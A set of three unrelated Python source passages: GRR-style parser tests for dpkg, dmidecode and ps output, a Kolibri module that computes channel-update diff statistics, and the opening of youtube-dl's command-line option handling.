out = list(parser.Parse("/usr/bin/dpkg", ["--list"], content, "", 0, None))
self.assertLen(out, 1)
package_list = out[0]
self.assertLen(package_list.packages, 181)
self.assertEqual(
package_list.packages[0],
rdf_client.SoftwarePackage(
name="acpi-support-base",
description="scripts for handling base ACPI events such as the power button",
version="0.140-5",
architecture="all",
install_state=rdf_client.SoftwarePackage.InstallState.INSTALLED))
self.assertEqual(
package_list.packages[22],
rdf_client.SoftwarePackage(
name="diffutils",
description=None, # Test package with empty description.
version="1:3.2-6",
architecture="amd64",
install_state=rdf_client.SoftwarePackage.InstallState.INSTALLED))
def testDpkgCmdParserPrecise(self):
"""Ensure we can extract packages from dpkg output on ubuntu precise."""
parser = linux_cmd_parser.DpkgCmdParser()
content = open(
os.path.join(self.base_path, "checks/data/dpkg.precise.out"),
"rb").read()
out = list(parser.Parse("/usr/bin/dpkg", ["--list"], content, "", 0, None))
self.assertLen(out, 1)
package_list = out[0]
self.assertLen(package_list.packages, 30)
self.assertEqual(
package_list.packages[0],
rdf_client.SoftwarePackage(
name="adduser",
description="add and remove users and groups",
version="3.113ubuntu2",
architecture=None,
install_state=rdf_client.SoftwarePackage.InstallState.INSTALLED))
self.assertEqual(
package_list.packages[12],
rdf_client.SoftwarePackage(
name="diffutils",
description=None, # Test package with empty description.
version="1:3.2-1ubuntu1",
architecture=None,
install_state=rdf_client.SoftwarePackage.InstallState.INSTALLED))
def testDmidecodeParser(self):
"""Test to see if we can get data from dmidecode output."""
parser = linux_cmd_parser.DmidecodeCmdParser()
content = open(os.path.join(self.base_path, "dmidecode.out"), "rb").read()
parse_result = list(
parser.Parse("/usr/sbin/dmidecode", ["-q"], content, "", 0, None))
self.assertLen(parse_result, 1)
hardware = parse_result[0]
self.assertIsInstance(hardware, rdf_client.HardwareInfo)
self.assertEqual(hardware.serial_number, "2UA25107BB")
self.assertEqual(hardware.system_manufacturer, "Hewlett-Packard")
self.assertEqual(hardware.system_product_name, "HP Z420 Workstation")
self.assertEqual(hardware.system_uuid,
"4596BF80-41F0-11E2-A3B4-10604B5C7F38")
self.assertEqual(hardware.system_sku_number, "C2R51UC#ABA")
self.assertEqual(hardware.system_family, "103C_53335X G=D")
self.assertEqual(hardware.bios_vendor, "Hewlett-Packard")
self.assertEqual(hardware.bios_version, "J61 v02.08")
self.assertEqual(hardware.bios_release_date, "10/17/2012")
self.assertEqual(hardware.bios_rom_size, "16384 kB")
self.assertEqual(hardware.bios_revision, "2.8")
class PsCmdParserTest(absltest.TestCase):
def testRealOutput(self):
stdout = """\
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Oct02 ? 00:01:35 /sbin/init splash
root 2 0 0 Oct02 ? 00:00:00 [kthreadd]
root 5 2 0 Oct02 ? 00:00:00 [kworker/0:0H]
colord 68931 1 0 Oct02 ? 00:00:00 /usr/lib/colord/colord
foobar 69081 69080 1 Oct02 ? 02:08:49 cinnamon --replace
"""
parser = linux_cmd_parser.PsCmdParser()
processes = list(parser.Parse("/bin/ps", "-ef", stdout, "", 0, None))
self.assertLen(processes, 5)
self.assertEqual(processes[0].username, "root")
self.assertEqual(processes[0].pid, 1)
self.assertEqual(processes[0].ppid, 0)
self.assertEqual(processes[0].cpu_percent, 0.0)
self.assertEqual(processes[0].terminal, "?")
self.assertEqual(processes[0].cmdline, ["/sbin/init", "splash"])
self.assertEqual(processes[1].username, "root")
self.assertEqual(processes[1].pid, 2)
self.assertEqual(processes[1].ppid, 0)
self.assertEqual(processes[1].cpu_percent, 0.0)
self.assertEqual(processes[1].terminal, "?")
self.assertEqual(processes[1].cmdline, ["[kthreadd]"])
self.assertEqual(processes[2].username, "root")
self.assertEqual(processes[2].pid, 5)
self.assertEqual(processes[2].ppid, 2)
self.assertEqual(processes[2].cpu_percent, 0.0)
self.assertEqual(processes[2].terminal, "?")
self.assertEqual(processes[2].cmdline, ["[kworker/0:0H]"])
self.assertEqual(processes[3].username, "colord")
self.assertEqual(processes[3].pid, 68931)
self.assertEqual(processes[3].ppid, 1)
self.assertEqual(processes[3].cpu_percent, 0.0)
self.assertEqual(processes[3].terminal, "?")
self.assertEqual(processes[3].cmdline, ["/usr/lib/colord/colord"])
self.assertEqual(processes[4].username, "foobar")
self.assertEqual(processes[4].pid, 69081)
self.assertEqual(processes[4].ppid, 69080)
self.assertEqual(processes[4].cpu_percent, 1.0)
self.assertEqual(processes[4].terminal, "?")
self.assertEqual(processes[4].cmdline, ["cinnamon", "--replace"])
def testDoesNotFailOnIncorrectInput(self):
stdout = """\
UID PID PPID C STIME TTY TIME CMD
foo 1 0 0 Sep01 ? 00:01:23 /baz/norf
bar 2 1 0 Sep02 ? 00:00:00 /baz/norf --thud --quux
THIS IS AN INVALID LINE
quux 5 2 0 Sep03 ? 00:00:00 /blargh/norf
quux ??? ??? 0 Sep04 ? 00:00:00 ???
foo 4 2 0 Sep05 ? 00:00:00 /foo/bar/baz --quux=1337
"""
parser = linux_cmd_parser.PsCmdParser()
processes = list(parser.Parse("/bin/ps", "-ef", stdout, "", 0, None))
self.assertLen(processes, 4)
self.assertEqual(processes[0].username, "foo")
self.assertEqual(processes[0].pid, 1)
self.assertEqual(processes[0].ppid, 0)
self.assertEqual(processes[0].cpu_percent, 0)
self.assertEqual(processes[0].terminal, "?")
self.assertEqual(processes[0].cmdline, ["/baz/norf"])
self.assertEqual(processes[1].username, "bar")
self.assertEqual(processes[1].pid, 2)
self.assertEqual(processes[1].ppid, 1)
self.assertEqual(processes[1].cpu_percent, 0)
self.assertEqual(processes[1].terminal, "?")
self.assertEqual(processes[1].cmdline, ["/baz/norf", "--thud", "--quux"])
self.assertEqual(processes[2].username, "quux")
self.assertEqual(processes[2].pid, 5)
self.assertEqual(processes[2].ppid, 2)
self.assertEqual(processes[2].cpu_percent, 0)
self.assertEqual(processes[2].terminal, "?")
self.assertEqual(processes[2].cmdline, ["/blargh/norf"])
self.assertEqual(processes[3].username, "foo")
self.assertEqual(processes[3].pid, 4)
self.assertEqual(processes[3].ppid, 2)
self.assertEqual(processes[3].cpu_percent, 0)
self.assertEqual(processes[3].terminal, "?")
self.assertEqual(processes[3].cmdline, ["/foo/bar/baz", "--quux=1337"])
def main(args):
test_lib.main(args)
if __name__ == "__main__":
app.run(main)
| |
import logging
import os
from django.core.management import call_command
from le_utils.constants import content_kinds
from sqlalchemy import and_
from sqlalchemy import func
from sqlalchemy import or_
from sqlalchemy import select
from kolibri.core.content.constants.schema_versions import CURRENT_SCHEMA_VERSION
from kolibri.core.content.models import ContentNode
from kolibri.core.content.models import File
from kolibri.core.content.models import LocalFile
from kolibri.core.content.utils import annotation
from kolibri.core.content.utils import channel_import
from kolibri.core.content.utils.annotation import CONTENT_APP_NAME
from kolibri.core.content.utils.channels import CHANNEL_UPDATE_STATS_CACHE_KEY
from kolibri.core.content.utils.channels import get_mounted_drive_by_id
from kolibri.core.content.utils.content_types_tools import (
renderable_contentnodes_q_filter,
)
from kolibri.core.content.utils.content_types_tools import renderable_files_presets
from kolibri.core.content.utils.importability_annotation import (
get_channel_stats_from_disk,
)
from kolibri.core.content.utils.importability_annotation import (
get_channel_stats_from_peer,
)
from kolibri.core.content.utils.paths import get_annotated_content_database_file_path
from kolibri.core.content.utils.paths import get_upgrade_content_database_file_path
from kolibri.core.content.utils.sqlalchemybridge import Bridge
from kolibri.core.content.utils.sqlalchemybridge import coerce_key
from kolibri.core.content.utils.sqlalchemybridge import filter_by_uuids
from kolibri.core.tasks.exceptions import UserCancelledError
from kolibri.core.tasks.utils import get_current_job
from kolibri.core.utils.cache import process_cache
logger = logging.getLogger(__name__)
def clear_diff_stats(channel_id):
process_cache.delete(CHANNEL_UPDATE_STATS_CACHE_KEY.format(channel_id))
def diff_stats(channel_id, method, drive_id=None, baseurl=None):
"""
Download the channel database to an upgraded path.
Annotate the local file availability of the upgraded channel db.
Calculate diff stats comparing default db and annotated channel db.
"""
# upgraded content database path
source_path = get_upgrade_content_database_file_path(channel_id)
# annotated db to be used for calculating diff stats
destination_path = get_annotated_content_database_file_path(channel_id)
try:
if method == "network":
call_command(
"importchannel", "network", channel_id, baseurl=baseurl, no_upgrade=True
)
elif method == "disk":
drive = get_mounted_drive_by_id(drive_id)
call_command(
"importchannel", "disk", channel_id, drive.datafolder, no_upgrade=True
)
# create all fields/tables at the annotated destination db, based on the current schema version
bridge = Bridge(
sqlite_file_path=destination_path, schema_version=CURRENT_SCHEMA_VERSION
)
bridge.Base.metadata.create_all(bridge.engine)
# initialize import manager based on annotated destination path, pulling from source db path
import_manager = channel_import.initialize_import_manager(
channel_id,
cancel_check=False,
source=source_path,
destination=destination_path,
)
# import channel data from source db path
import_manager.import_channel_data()
import_manager.end()
# annotate file availability on destination db
annotation.set_local_file_availability_from_disk(destination=destination_path)
# get the diff count between whats on the default db and the annotated db
(
new_resource_ids,
new_resource_content_ids,
new_resource_total_size,
) = get_new_resources_available_for_import(destination_path, channel_id)
# get the count for leaf nodes which are in the default db, but not in the annotated db
resources_to_be_deleted_count = count_removed_resources(
destination_path, channel_id
)
# get the ids of leaf nodes which are now incomplete due to missing local files
(
updated_resource_ids,
updated_resource_content_ids,
updated_resource_total_size,
) = get_automatically_updated_resources(destination_path, channel_id)
# remove the annotated database
try:
os.remove(destination_path)
except OSError as e:
logger.info(
"Tried to remove {}, but exception {} occurred.".format(
destination_path, e
)
)
# annotate job metadata with diff stats
job = get_current_job()
if job:
job.extra_metadata["new_resources_count"] = len(new_resource_content_ids)
job.extra_metadata[
"deleted_resources_count"
] = resources_to_be_deleted_count
job.extra_metadata["updated_resources_count"] = len(
updated_resource_content_ids
)
job.save_meta()
CACHE_KEY = CHANNEL_UPDATE_STATS_CACHE_KEY.format(channel_id)
process_cache.set(
CACHE_KEY,
{
"new_resource_ids": new_resource_ids,
"new_resource_content_ids": new_resource_content_ids,
"new_resource_total_size": new_resource_total_size,
"updated_resource_ids": updated_resource_ids,
"updated_resource_content_ids": updated_resource_content_ids,
"updated_resource_total_size": updated_resource_total_size,
},
# Should persist until explicitly cleared (at content import)
# or until server restart.
None,
)
except UserCancelledError:
# remove the annotated database
try:
os.remove(destination_path)
except OSError:
pass
raise
batch_size = 1000
def get_new_resources_available_for_import(destination, channel_id):
"""
Queries the destination db to get leaf nodes.
Subtract total number of leaf nodes by the count of leaf nodes on default db to get the number of new resources.
"""
bridge = Bridge(app_name=CONTENT_APP_NAME, sqlite_file_path=destination)
# SQL Alchemy reference to the content node table
ContentNodeTable = bridge.get_table(ContentNode)
# SQL Alchemy reference to the file table - a mapping from
# contentnodes to the files that they use
FileTable = bridge.get_table(File)
# SQL Alchemy reference to the localfile table which tracks
# information about the files on disk, such as availability
LocalFileTable = bridge.get_table(LocalFile)
connection = bridge.get_connection()
# To efficiently get the node ids of all new nodes in the channel
# we are going to iterate over the currently existing nodes for the
# channel in the default database, and cache their existence in the
# temporary upgrade database by flagging them as 'available' in there
# We can then read out all of the unavailable ContentNodes in order
# to get a complete list of the newly available ids.
# We wrap this all in a transaction so that we can roll it back afterwards
# but this is mostly just not to leave the upgrade DB in a messy state
# and could be removed if it becomes a performance concern
# Create a queryset for the node ids of resources currently in this channel
# we will slice this later in a while loop in order to efficiently process this
# this is necessary otherwise we would end up querying tens of thousands of node ids
# for a large channel, which would then be impossible to pass into an update query
# for the temporary upgrade DB without causing an excessively large query
# greater than 1MB, which is the default max for SQLite
current_resource_node_id_queryset = (
ContentNode.objects.filter(channel_id=channel_id)
.exclude(kind=content_kinds.TOPIC)
.values_list("id", flat=True)
)
i = 0
# start a transaction
trans = connection.begin()
# Set everything to False to start with
connection.execute(
ContentNodeTable.update()
.where(ContentNodeTable.c.channel_id == channel_id)
.values(available=False)
)
node_ids = current_resource_node_id_queryset[i : i + batch_size]
while node_ids:
# Set everything to False to start with
connection.execute(
ContentNodeTable.update()
.where(
and_(
filter_by_uuids(
ContentNodeTable.c.id, node_ids, vendor=bridge.engine.name
),
ContentNodeTable.c.channel_id == channel_id,
)
)
.values(available=True)
)
i += batch_size
node_ids = current_resource_node_id_queryset[i : i + batch_size]
renderable_contentnodes = (
select([FileTable.c.contentnode_id])
.where(FileTable.c.supplementary == False) # noqa
.where(
or_(*(FileTable.c.preset == preset for preset in renderable_files_presets))
)
)
contentnode_filter_expression = and_(
ContentNodeTable.c.channel_id == channel_id,
ContentNodeTable.c.kind != content_kinds.TOPIC,
ContentNodeTable.c.available == False, # noqa
ContentNodeTable.c.id.in_(renderable_contentnodes),
)
new_resource_nodes_total_size = (
connection.execute(
# This does the first step in the many to many lookup for File
select([func.sum(LocalFileTable.c.file_size)]).where(
LocalFileTable.c.id.in_(
select([LocalFileTable.c.id])
.select_from(
# and LocalFile.
LocalFileTable.join(
FileTable.join(
ContentNodeTable,
FileTable.c.contentnode_id == ContentNodeTable.c.id,
), # This does the actual correlation between file and local file
FileTable.c.local_file_id == LocalFileTable.c.id,
)
)
.where(
and_(
# Filter only for files that are unavailable so we show
# the import size
LocalFileTable.c.available == False, # noqa
contentnode_filter_expression,
)
)
)
)
).fetchone()[0]
or 0
)
new_resource_node_ids_statement = select([ContentNodeTable.c.id]).where(
and_(
ContentNodeTable.c.channel_id == channel_id,
ContentNodeTable.c.kind != content_kinds.TOPIC,
ContentNodeTable.c.available == False, # noqa
)
)
new_resource_node_ids = list(
coerce_key(c[0])
for c in connection.execute(new_resource_node_ids_statement).fetchall()
)
trans.rollback()
# Create a queryset for the content_ids of resources currently in this channel
# we will slice this later in a while loop in order to efficiently process this
# this is necessary otherwise we would end up querying tens of thousands of node ids
# for a large channel, which would then be impossible to pass into an update query
# for the temporary upgrade DB without causing an excessively large query
# greater than 1MB, which is the default max for SQLite
current_resource_content_id_queryset = (
ContentNode.objects.filter(channel_id=channel_id)
.exclude(kind=content_kinds.TOPIC)
.values_list("content_id", flat=True)
)
i = 0
# start a transaction
trans = connection.begin()
# Set everything to False to start with
connection.execute(
ContentNodeTable.update()
.where(ContentNodeTable.c.channel_id == channel_id)
.values(available=False)
)
content_ids = current_resource_content_id_queryset[i : i + batch_size]
while content_ids:
# Set everything to False to start with
connection.execute(
ContentNodeTable.update()
.where(
and_(
filter_by_uuids(
ContentNodeTable.c.content_id,
content_ids,
vendor=bridge.engine.name,
),
ContentNodeTable.c.channel_id == channel_id,
)
)
.values(available=True)
)
i += batch_size
content_ids = current_resource_content_id_queryset[i : i + batch_size]
new_resource_content_ids_statement = (
select([ContentNodeTable.c.content_id])
.where(
and_(
ContentNodeTable.c.channel_id == channel_id,
ContentNodeTable.c.kind != content_kinds.TOPIC,
ContentNodeTable.c.available == False, # noqa
)
)
.distinct()
)
new_resource_content_ids = list(
coerce_key(c[0])
for c in connection.execute(new_resource_content_ids_statement).fetchall()
)
trans.rollback()
return (
new_resource_node_ids,
new_resource_content_ids,
new_resource_nodes_total_size,
)
def count_removed_resources(destination, channel_id):
"""
Queries the destination db to get the leaf node content_ids.
Subtract available leaf nodes count on default db by available
leaf nodes based on destination db leaf node content_ids.
"""
bridge = Bridge(app_name=CONTENT_APP_NAME, sqlite_file_path=destination)
connection = bridge.get_connection()
ContentNodeTable = bridge.get_table(ContentNode)
resource_node_ids_statement = (
select([ContentNodeTable.c.id])
.where(
and_(
ContentNodeTable.c.channel_id == channel_id,
ContentNodeTable.c.kind != content_kinds.TOPIC,
)
)
.limit(batch_size)
)
i = 0
resource_node_ids = [
coerce_key(cid[0])
for cid in connection.execute(resource_node_ids_statement.offset(i)).fetchall()
]
content_ids_after_upgrade = set()
# Batch the query here, as passing too many uuids into Django could cause
# the a SQL query too large error. This will happen around about 30000+ uuids.
# Could probably batch at 10000 rather than 1000 - but using 1000 to be defensive.
while resource_node_ids:
content_ids_after_upgrade.update(
(
ContentNode.objects.filter_by_uuids(resource_node_ids, validate=False)
.exclude(kind=content_kinds.TOPIC)
.filter(available=True, channel_id=channel_id)
.values_list("content_id", flat=True)
.distinct()
)
)
i += batch_size
resource_node_ids = [
coerce_key(cid[0])
for cid in connection.execute(
resource_node_ids_statement.offset(i)
).fetchall()
]
total_resources_after_upgrade = len(content_ids_after_upgrade)
return (
ContentNode.objects.filter(channel_id=channel_id, available=True)
.exclude(kind=content_kinds.TOPIC)
.values("content_id")
.distinct()
.count()
- total_resources_after_upgrade
)
def get_automatically_updated_resources(destination, channel_id):
"""
Queries the destination db to get the leaf node ids, where local file objects are unavailable.
Get the available node ids related to those missing file objects.
"""
bridge = Bridge(app_name=CONTENT_APP_NAME, sqlite_file_path=destination)
connection = bridge.get_connection()
ContentNodeTable = bridge.get_table(ContentNode)
# SQL Alchemy reference to the file table - a mapping from
# contentnodes to the files that they use
FileTable = bridge.get_table(File)
# SQL Alchemy reference to the localfile table which tracks
# information about the files on disk, such as availability
LocalFileTable = bridge.get_table(LocalFile)
# get unavailable local file ids on the destination db
unavailable_local_file_ids_statement = select([LocalFileTable.c.id]).where(
LocalFileTable.c.available == False # noqa
)
# get the Contentnode ids where File objects are missing in the destination db
contentnode_ids_statement = (
select([FileTable.c.contentnode_id])
.where(
and_(
FileTable.c.local_file_id.in_(unavailable_local_file_ids_statement),
FileTable.c.supplementary == False, # noqa
or_(
*(
FileTable.c.preset == preset
for preset in renderable_files_presets
)
),
)
)
.limit(batch_size)
)
i = 0
updated_resource_ids = set()
updated_resource_content_ids = set()
contentnode_ids = [
coerce_key(cid[0])
for cid in connection.execute(contentnode_ids_statement.offset(i)).fetchall()
]
while contentnode_ids:
# Exclude topics from here to prevent erroneous imports of their children
# This should already be excluded as we are filtering to renderable files
# so this is more of a sanity check
for c in (
ContentNode.objects.filter_by_uuids(contentnode_ids, validate=False)
.filter(available=True, channel_id=channel_id)
.exclude(kind=content_kinds.TOPIC)
.values_list("id", "content_id")
):
updated_resource_ids.add(c[0])
updated_resource_content_ids.add(c[1])
i += batch_size
contentnode_ids = [
coerce_key(cid[0])
for cid in connection.execute(
contentnode_ids_statement.offset(i)
).fetchall()
]
# Do this after we have fetched all the ids and made them unique
# otherwise, because we are getting our ids from the File table, we could
# end up with a duplicate count of file sizes
updated_resources_total_size = 0
i = 0
# Coerce to lists
updated_resource_ids = list(updated_resource_ids)
updated_resource_content_ids = list(updated_resource_content_ids)
ids_batch = updated_resource_ids[i : i + batch_size]
while ids_batch:
contentnode_filter_expression = filter_by_uuids(
ContentNodeTable.c.id, ids_batch, vendor=bridge.engine.name
)
# This does the first step in the many to many lookup for File
updated_resources_total_size += connection.execute(
select([func.sum(LocalFileTable.c.file_size)]).where(
LocalFileTable.c.id.in_(
select([LocalFileTable.c.id])
.select_from(
# and LocalFile.
LocalFileTable.join(
FileTable.join(
ContentNodeTable,
FileTable.c.contentnode_id == ContentNodeTable.c.id,
), # This does the actual correlation between file and local file
FileTable.c.local_file_id == LocalFileTable.c.id,
)
)
.where(
and_(
# Filter only for files that are unavailable so we show
# the import size
LocalFileTable.c.available == False, # noqa
contentnode_filter_expression,
)
)
)
)
).fetchone()[0]
i += batch_size
ids_batch = updated_resource_ids[i : i + batch_size]
return (
updated_resource_ids,
updated_resource_content_ids,
updated_resources_total_size,
)
def get_import_data_for_update(
channel_id, drive_id=None, peer_id=None, renderable_only=True
):
update_stats = process_cache.get(CHANNEL_UPDATE_STATS_CACHE_KEY.format(channel_id))
if not update_stats:
raise ValueError(
"Tried to get update content nodes for channel {} that has no precalculated update stats".format(
channel_id
)
)
# By default don't filter node ids by their underlying file importability
file_based_node_id_dict = None
if drive_id:
file_based_node_id_dict = get_channel_stats_from_disk(channel_id, drive_id)
if peer_id:
file_based_node_id_dict = get_channel_stats_from_peer(channel_id, peer_id)
updated_resource_ids = update_stats.get("updated_resource_ids", [])
i = 0
updated_ids_slice = updated_resource_ids[i : i + batch_size]
nodes_to_include = ContentNode.objects.filter(channel_id=channel_id)
# if requested, filter out nodes we're not able to render
if renderable_only:
nodes_to_include = nodes_to_include.filter(renderable_contentnodes_q_filter)
queried_file_objects = []
content_ids = set()
while updated_ids_slice:
if file_based_node_id_dict is not None:
# If we have a list of limited node id availability limit our slice here
updated_ids_slice = list(
filter(lambda x: x in file_based_node_id_dict, updated_ids_slice)
)
# Possible that the above filtering rendered our list empty, so skip queries
# in that case
if updated_ids_slice:
batch_nodes = nodes_to_include.filter_by_uuids(updated_ids_slice)
content_ids.update(
batch_nodes.values_list("content_id", flat=True).distinct()
)
files_to_transfer = LocalFile.objects.filter(
available=False, files__contentnode__in=batch_nodes
)
queried_file_objects.extend(files_to_transfer)
i += batch_size
updated_ids_slice = updated_resource_ids[i : i + batch_size]
# Get all nodes that are marked as available but have missing files.
# This will ensure that we update thumbnails, and other files.
queried_file_objects.extend(
LocalFile.objects.filter(
available=False,
files__contentnode__in=ContentNode.objects.filter(
available=True, channel_id=channel_id
),
)
)
checksums = set()
total_bytes_to_transfer = 0
files_to_download = []
for file in queried_file_objects:
if file.id not in checksums:
checksums.add(file.id)
total_bytes_to_transfer += file.file_size
files_to_download.append(file)
return len(content_ids), files_to_download, total_bytes_to_transfer
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
__license__ = 'Public Domain'
import codecs
import io
import os
import random
import sys
from .options import (
parseOpts,
)
from .compat import (
compat_expanduser,
compat_getpass,
compat_print,
compat_shlex_split,
workaround_optparse_bug9161,
)
from .utils import (
DateRange,
decodeOption,
DEFAULT_OUTTMPL,
DownloadError,
match_filter_func,
MaxDownloadsReached,
preferredencoding,
read_batch_urls,
SameFileError,
setproctitle,
std_headers,
write_string,
)
from .update import update_self
from .downloader import (
FileDownloader,
)
from .extractor import gen_extractors, list_extractors
from .YoutubeDL import YoutubeDL
def _real_main(argv=None):
# Compatibility fixes for Windows
if sys.platform == 'win32':
# https://github.com/rg3/youtube-dl/issues/820
codecs.register(lambda name: codecs.lookup('utf-8') if name == 'cp65001' else None)
workaround_optparse_bug9161()
setproctitle('youtube-dl')
parser, opts, args = parseOpts(argv)
# Set user agent
if opts.user_agent is not None:
std_headers['User-Agent'] = opts.user_agent
# Set referer
if opts.referer is not None:
std_headers['Referer'] = opts.referer
# Custom HTTP headers
if opts.headers is not None:
for h in opts.headers:
if h.find(':', 1) < 0:
parser.error('wrong header formatting, it should be key:value, not "%s"' % h)
key, value = h.split(':', 2)
if opts.verbose:
write_string('[debug] Adding header from command line option %s:%s\n' % (key, value))
std_headers[key] = value
# Dump user agent
if opts.dump_user_agent:
compat_print(std_headers['User-Agent'])
sys.exit(0)
# Batch file verification
batch_urls = []
if opts.batchfile is not None:
try:
if opts.batchfile == '-':
batchfd = sys.stdin
else:
batchfd = io.open(opts.batchfile, 'r', encoding='utf-8', errors='ignore')
batch_urls = read_batch_urls(batchfd)
if opts.verbose:
write_string('[debug] Batch file urls: ' + repr(batch_urls) + '\n')
except IOError:
sys.exit('ERROR: batch file could not be read')
all_urls = batch_urls + args
all_urls = [url.strip() for url in all_urls]
_enc = preferredencoding()
all_urls = [url.decode(_enc, 'ignore') if isinstance(url, bytes) else url for url in all_urls]
if opts.list_extractors:
for ie in list_extractors(opts.age_limit):
compat_print(ie.IE_NAME + (' (CURRENTLY BROKEN)' if not ie._WORKING else ''))
matchedUrls = [url for url in all_urls if ie.suitable(url)]
for mu in matchedUrls:
compat_print(' ' + mu)
sys.exit(0)
if opts.list_extractor_descriptions:
for ie in list_extractors(opts.age_limit):
if not ie._WORKING:
continue
desc = getattr(ie, 'IE_DESC', ie.IE_NAME)
if desc is False:
continue
if hasattr(ie, 'SEARCH_KEY'):
_SEARCHES = ('cute kittens', 'slithering pythons', 'falling cat', 'angry poodle', 'purple fish', 'running tortoise', 'sleeping bunny', 'burping cow')
_COUNTS = ('', '5', '10', 'all')
desc += ' (Example: "%s%s:%s" )' % (ie.SEARCH_KEY, random.choice(_COUNTS), random.choice(_SEARCHES))
compat_print(desc)
sys.exit(0)
# Conflicting, missing and erroneous options
if opts.usenetrc and (opts.username is not None or opts.password is not None):
parser.error('using .netrc conflicts with giving username/password')
if opts.password is not None and opts.username is None:
parser.error('account username missing\n')
if opts.outtmpl is not None and (opts.usetitle or opts.autonumber or opts.useid):
parser.error('using output template conflicts with using title, video ID or auto number')
if opts.usetitle and opts.useid:
parser.error('using title conflicts with using video ID')
if opts.username is not None and opts.password is None:
opts.password = compat_getpass('Type account password and press [Return]: ')
if opts.ratelimit is not None:
numeric_limit = FileDownloader.parse_bytes(opts.ratelimit)
if numeric_limit is None:
parser.error('invalid rate limit specified')
opts.ratelimit = numeric_limit
if opts.min_filesize is not None:
numeric_limit = FileDownloader.parse_bytes(opts.min_filesize)
if numeric_limit is None:
parser.error('invalid min_filesize specified')
opts.min_filesize = numeric_limit
if opts.max_filesize is not None:
numeric_limit = FileDownloader.parse_bytes(opts.max_filesize)
if numeric_limit is None:
parser.error('invalid max_filesize specified')
opts.max_filesize = numeric_limit
if opts.retries is not None:
if opts.retries in ('inf', 'infinite'):
opts_retries = float('inf')
else:
try:
opts_retries = int(opts.retries)
except (TypeError, ValueError):
parser.error('invalid retry count specified')
if opts.buffersize is not None:
numeric_buffersize = FileDownloader.parse_bytes(opts.buffersize)
if numeric_buffersize is None:
parser.error('invalid buffer size specified')
opts.buffersize = numeric_buffersize
if opts.playliststart <= 0:
raise ValueError('Playlist start must be positive')
if opts.playlistend not in (-1, None) and opts.playlistend < opts.playliststart:
raise ValueError('Playlist end must be greater than playlist start')
if opts.extractaudio:
if opts.audioformat not in ['best', 'aac', 'mp3', 'm4a', 'opus', 'vorbis', 'wav']:
parser.error('invalid audio format specified')
if opts.audioquality:
opts.audioquality = opts.audioquality.strip('k').strip('K')
if not opts.audioquality.isdigit():
parser.error('invalid audio quality specified')
if opts.recodevideo is not None:
if opts.recodevideo not in ['mp4', 'flv', 'webm', 'ogg', 'mkv', 'avi']:
parser.error('invalid video recode format specified')
if opts.convertsubtitles is not None:
if opts.convertsubtitles not in ['srt', 'vtt', 'ass']:
parser.error('invalid subtitle format specified')
if opts.date is not None:
date = DateRange.day(opts.date)
else:
date = DateRange(opts.dateafter, opts.datebefore)
# Do not download videos when there are audio-only formats
if opts.extractaudio and not opts.keepvideo and opts.format is None:
opts.format = 'bestaudio/best'
# --all-sub automatically sets --write-sub if --write-auto-sub is not given
# this was the old behaviour if only --all-sub was given.
if opts.allsubtitles and not opts.writeautomaticsub:
opts.writesubtitles = True
outtmpl = ((opts.outtmpl is not None and opts.outtmpl) or
(opts.format == '-1' and opts.usetitle and '%(title)s-%(id)s-%(format)s.%(ext)s') or
(opts.format == '-1' and '%(id)s-%(format)s.%(ext)s') or
(opts.usetitle and opts.autonumber and '%(autonumber)s-%(title)s-%(id)s.%(ext)s') or
(opts.usetitle and '%(title)s-%(id)s.%(ext)s') or
(opts.useid and '%(id)s.%(ext)s') or
(opts.autonumber and '%(autonumber)s-%(id)s.%(ext)s') or
DEFAULT_OUTTMPL)
if not os.path.splitext(outtmpl)[1] and opts.extractaudio:
parser.error('Cannot download a video and extract audio into the same'
' file! Use "{0}.%(ext)s" instead of "{0}" as the output'
' template'.format(outtmpl))
any_getting = opts.geturl or opts.gettitle or opts.getid or opts.getthumbnail or opts.getdescription or opts.getfilename or opts.getformat or opts.getduration or opts.dumpjson or opts.dump_single_json
any_printing = opts.print_json
download_archive_fn = compat_expanduser(opts.download_archive) if opts.download_archive is not None else opts.download_archive
# PostProcessors
postprocessors = []
# Add the metadata pp first, the other pps will copy it
if opts.metafromtitle:
postprocessors.append({
'key': 'MetadataFromTitle',
'titleformat': opts.metafromtitle
})
if opts.addmetadata:
postprocessors.append({'key': 'FFmpegMetadata'})
if opts.extractaudio:
postprocessors.append({
'key': 'FFmpegExtractAudio',
'preferredcodec': opts.audioformat,
'preferredquality': opts.audioquality,
'nopostoverwrites': opts.nopostoverwrites,
})
if opts.recodevideo:
postprocessors.append({
'key': 'FFmpegVideoConvertor',
'preferedformat': opts.recodevideo,
})
if opts.convertsubtitles:
postprocessors.append({
'key': 'FFmpegSubtitlesConvertor',
'format': opts.convertsubtitles,
})
if opts.embedsubtitles:
postprocessors.append({
'key': 'FFmpegEmbedSubtitle',
})
if opts.xattrs:
postprocessors.append({'key': 'XAttrMetadata'})
if opts.embedthumbnail:
already_have_thumbnail = opts.writethumbnail or opts.write_all_thumbnails
postprocessors.append({
'key': 'EmbedThumbnail',
'already_have_thumbnail': already_have_thumbnail
})
if not already_have_thumbnail:
opts.writethumbnail = True
# Please keep ExecAfterDownload towards the bottom as it allows the user to modify the final file in any way.
# So if the user is able to remove the file before your postprocessor runs it might cause a few problems.
if opts.exec_cmd:
postprocessors.append({
'key': 'ExecAfterDownload',
'exec_cmd': opts.exec_cmd,
})
if opts.xattr_set_filesize:
try:
import xattr
xattr # Confuse flake8
except ImportError:
parser.error('setting filesize xattr requested but python-xattr is not available')
external_downloader_args = None
if opts.external_downloader_args:
external_downloader_args = compat_shlex_split(opts.external_downloader_args)
postprocessor_args = None
if opts.postprocessor_args:
postprocessor_args = compat_shlex_split(opts.postprocessor_args)
match_filter = (
None if opts.match_filter is None
else match_filter_func(opts.match_filter))
ydl_opts = {
'usenetrc': opts.usenetrc,
'username': opts.username,
'password': opts.password,
'twofactor': opts.twofactor,
'videopassword': opts.videopassword,
'quiet': (opts.quiet or any_getting or any_printing),
'no_warnings': opts.no_warnings,
'forceurl': opts.geturl,
'forcetitle': opts.gettitle,
'forceid': opts.getid,
'forcethumbnail': opts.getthumbnail,
'forcedescription': opts.getdescription,
'forceduration': opts.getduration,
'forcefilename': opts.getfilename,
'forceformat': opts.getformat,
'forcejson': opts.dumpjson or opts.print_json,
'dump_single_json': opts.dump_single_json,
'simulate': opts.simulate or any_getting,
'skip_download': opts.skip_download,
'format': opts.format,
'listformats': opts.listformats,
'outtmpl': outtmpl,
'autonumber_size': opts.autonumber_size,
